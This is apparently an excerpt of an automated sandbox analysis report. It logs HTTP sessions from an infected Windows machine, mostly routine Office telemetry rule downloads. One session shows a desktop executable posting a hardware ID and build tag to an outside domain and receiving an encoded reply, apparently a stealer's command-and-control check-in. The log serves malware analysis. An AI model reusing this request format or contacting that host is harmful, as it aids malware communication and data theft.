                                                                                                                                                                                                2024-11-24 02:04:28 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                13192.168.2.54972013.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-24 02:04:27 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-24 02:04:28 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:04:27 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 408
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                x-ms-request-id: 4a9b7938-301e-000c-7880-3d323f000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241124T020427Z-174c587ffdfmlsmvhC1TEBvyks00000003x000000000d1dx
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-24 02:04:28 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                14192.168.2.549722104.21.33.1164432608C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-24 02:04:27 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 88
                                                                                                                                                                                                Host: property-imper.sbs
                                                                                                                                                                                                2024-11-24 02:04:27 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 38 38 32 44 36 41 45 36 41 46 43 38 30 30 38 46 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32
                                                                                                                                                                                                Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=882D6AE6AFC8008FD7CBBD6DF28D3732
                                                                                                                                                                                                2024-11-24 02:04:28 UTC1015INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:04:28 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=9jecimtk1n8308e39mn4mbe15l; expires=Wed, 19-Mar-2025 19:51:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XYPMomCA5%2F4qdRCgApi%2FmUpDTvtwRLvQYQ1kYf0J8F%2FLRi6OCjjvsy8r8dQwfoVPml67w%2BYLZqHouOuFxtSi5kLcXzFlTSYMcfH7bFt8riyuH34JCsKhE30cAlBpn5kMG8IuZTQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8e75d413cd3cc468-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1584&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=990&delivery_rate=1801357&cwnd=252&unsent_bytes=0&cid=04a5904cdc2052da&ts=738&x=0"
                                                                                                                                                                                                2024-11-24 02:04:28 UTC214INData Raw: 64 30 0d 0a 30 54 46 4d 6e 33 73 33 75 6d 78 76 4e 6a 4a 79 59 6d 6c 36 51 67 58 53 61 45 78 72 58 37 6b 30 4f 41 6f 77 39 37 6b 71 6e 4e 43 4b 53 6d 37 71 57 51 32 59 42 42 74 43 51 6b 67 2b 52 69 5a 74 4e 4f 70 64 59 6c 6c 75 6a 42 6f 4a 4f 77 50 5a 69 42 7a 41 2f 37 35 58 4b 73 4e 55 55 39 38 4b 51 56 4e 4b 46 30 42 46 57 43 52 78 38 46 4a 38 52 33 33 63 46 67 49 37 54 64 76 43 43 4f 6e 79 36 78 4d 6b 36 77 39 48 67 44 42 41 61 68 31 44 57 6c 78 55 63 44 54 6e 52 6e 31 61 62 4a 63 46 44 6c 59 66 68 4d 31 50 2f 62 32 4e 48 6a 37 2b 46 56 50 56 41 55 46 54 53 68 64 41 52 56 67 6b 63 66 42 53 66 45 64 39 33 42 59 43 4f 6b 32 71 0d 0a
                                                                                                                                                                                                Data Ascii: d00TFMn3s3umxvNjJyYml6QgXSaExrX7k0OAow97kqnNCKSm7qWQ2YBBtCQkg+RiZtNOpdYllujBoJOwPZiBzA/75XKsNUU98KQVNKF0BFWCRx8FJ8R33cFgI7TdvCCOny6xMk6w9HgDBAah1DWlxUcDTnRn1abJcFDlYfhM1P/b2NHj7+FVPVAUFTShdARVgkcfBSfEd93BYCOk2q
                                                                                                                                                                                                2024-11-24 02:04:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                15192.168.2.54972413.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-24 02:04:29 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-24 02:04:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:04:29 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 474
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                x-ms-request-id: 4712fcc8-d01e-002b-279a-3b25fb000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241124T020429Z-174c587ffdf8fcgwhC1TEBnn7000000003yg00000000a790
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-24 02:04:29 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                16192.168.2.54972613.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-24 02:04:29 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-24 02:04:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:04:30 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 415
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                x-ms-request-id: 30601852-401e-0047-7476-3b8597000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241124T020430Z-174c587ffdf8fcgwhC1TEBnn7000000003ug00000000rtdt
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-24 02:04:30 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                17192.168.2.54972513.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-24 02:04:29 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-24 02:04:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:04:30 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 471
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                x-ms-request-id: 8592a006-f01e-0085-6b6a-3c88ea000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241124T020430Z-174c587ffdftv9hphC1TEBm29w00000003u00000000005xq
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-24 02:04:30 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                18192.168.2.54972713.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-24 02:04:29 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-24 02:04:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:04:30 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 632
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                x-ms-request-id: b54876a2-a01e-0070-6764-3b573b000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241124T020430Z-178bfbc474bq2pr7hC1NYCkfgg00000005gg0000000057p8
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-24 02:04:30 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                19192.168.2.54972813.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-24 02:04:30 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-24 02:04:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:04:30 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 467
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                x-ms-request-id: de6003cd-b01e-0098-493c-3ccead000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241124T020430Z-178bfbc474bscnbchC1NYCe7eg00000005b000000000m5s2
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-24 02:04:30 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                20192.168.2.54973013.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-24 02:04:31 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-24 02:04:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:04:32 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 407
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                x-ms-request-id: 239436ba-d01e-0028-7bd5-3b7896000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241124T020432Z-15b8b599d88z9sc7hC1TEBkr4w00000003w000000000cya2
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-24 02:04:32 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                21192.168.2.54973113.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-24 02:04:32 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-24 02:04:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:04:32 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 486
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                x-ms-request-id: eb1ded04-b01e-0097-298c-3a4f33000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241124T020432Z-174c587ffdfldtt2hC1TEBwv9c00000003h000000000n34x
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
